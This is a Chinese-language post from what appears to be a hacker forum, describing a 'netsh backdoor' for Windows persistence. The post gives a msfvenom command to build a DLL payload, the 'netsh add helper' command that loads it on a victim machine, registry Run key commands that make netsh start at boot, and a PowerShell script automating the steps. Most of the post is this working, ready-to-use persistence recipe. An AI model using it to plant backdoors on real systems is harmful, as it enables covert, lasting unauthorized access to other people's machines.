• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

netsh后门


This Wind

Recommended Posts

Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红色团队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。

通过msfvenom生成一个dll

msfvenom -p widnows/x64/exec CMD=calc.exe -f dll > test.dll

Mei1yV.png

在受害机执行

netsh add helper <DLL_PATH>

MeiUY9.png

之后netsh一运行就会加载DLL(加载完DLL后自动运行netsh,关闭之后。再此之后执行的netsh都会加载dll)
MeiwS1.png

如果要实现启动系统自动运行netsh,得修改注册表

 reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';

这里我用powershell实现了一个简单的功能

 param (
    [string]$path = "NULL"
 )
 if($path -eq "NULL"){
    Write-Host "netsh.ps1 -path <DLL_path>";
    exit(0);
 }else{
    write-host "[*] reboot run netsh";
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';
    netsh add helper $path;
}

1582043730-12042c363c08c23.png

  • Like! 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now